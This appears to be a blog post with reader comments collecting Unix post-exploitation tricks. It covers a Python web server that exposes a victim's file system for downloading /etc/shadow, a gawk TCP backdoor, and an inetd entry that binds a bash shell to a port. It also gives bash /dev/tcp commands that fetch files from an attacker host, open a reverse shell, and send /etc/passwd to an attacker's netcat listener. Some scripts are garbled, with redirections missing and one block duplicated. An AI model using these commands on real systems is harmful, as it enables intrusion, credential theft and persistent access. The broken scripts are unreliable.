If you can use a web app to execute shell commands on the victim:

cd / && python -m SimpleHTTPServer

then

Python will start it’s own web server listening on port 8000. You can surf to the victim on that port: http://victim:8000 and then transverse the entire file system and download /etc/passwd and /etc/shadow.

Tested on macos x 10.5.3 and Safari 3.1.1. For other *nix variants, your mileage may vary.

Credit: Phrack 62

#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}

• Pick an obscure service from /etc/services associated with a tcp port 1024 and above…for example laplink

  laplink         1547/tcp     # laplink

• Add the following line to /etc/inetd.conf

  laplink    stream  tcp     nowait  /bin/bash bash -i

• restart inetd.conf

  killall -HUP inetd

Explaination: You are creating a listener on port tcp/1547 that will shovel you a bash shell.

Caveat: this obviously is not my *idea* It’s just very VERY old stuff that still works.

1. Put the file in the web root of the attacker box (I’m thinking of the web server in backtrack.
2. Start up the web server on the attacker box
3. On the victim box do:

(echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" \
1>&3 & cat 0<&3) 3 /dev/tcp/AttackerIP/80 \
| (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; \
do read i; done; cat) > local_filename

Credit where credit is due:
http://www.pebble.org.uk/linux/bashbrowser

Ok here is how to use this bash /dev/tcp trick to move a file.

1. On attacker’s box: I want to move a file named test.txt to the victim box

   cat test.txt | nc -l 3333

2. I’ll then connect out from victim to attacker’s port 3333 and pull back the file test.txt

   bash -i >& /dev/tcp/attackersIP/8080 0>&1 > test.txt

Advantages: netcat stays on the attacker’s box. All I use on the victim box is what’s already there…bash ;-)

————————————–

ok so you are probably saying “That’s nice” but if I’m already on the victim and I want to say transfer /etc/password or /etc/shadow back to my attacker’s box and I’m too lazy to do terminal copy and paste…then what?

1. on attacker’s box do

   nc -l -p 8080 -vvv > passwd

2. on victim box do

   cat /etc/passwd > /dev/tcp/attackerIP/8080

and like magic the victim’s /etc/password is transferred to the attacker’s box.

thanks for pointing me in the right direction ;-)
Mr. Google sez: http://www.codeproject.com/KB/cs/ReverseRAT.aspx

LOL
Awesome!

Yeh this was old school goodness ;-)
I love the idea of using what’s already there. Now what I’d like is an equivalent on windows!

#!/bin/bash
exec 3 /dev/tcp/$1/80
echo -e "Get /simple?se=1 HTTP/1.0\n" >&3
cat <&3

#!/bin/bash
exec 3 /dev/tcp/$1/80
echo -e "Get /simple?se=1 HTTP/1.0\n" >&3
cat <&3

You’d feed the http://www.whatever.com on the command line.

usage:

./script http://www.whatever.com

i know this post its about the reverse shell.
-But “debian users” whatch this post about
Default-bash:/dev/tcp

http://bugs.debian.org/cgi-bin.....bug=146464

Works on Redhat Enterprise 4 and 5.

But works fine!

Thx for nice post pdp!